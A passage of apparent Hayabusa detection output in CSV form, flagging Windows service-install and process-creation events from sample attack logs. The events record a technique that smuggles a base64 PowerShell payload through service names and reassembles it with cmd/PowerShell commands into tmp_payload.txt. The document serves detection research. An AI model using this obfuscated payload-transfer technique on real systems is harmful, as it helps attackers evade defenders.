Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:34:27.978 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:27.993 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:27.993 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:30.888 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:30.888 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:30.888 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:35.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:35.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:35.401 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.274 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.290 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.290 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.635 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.651 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.651 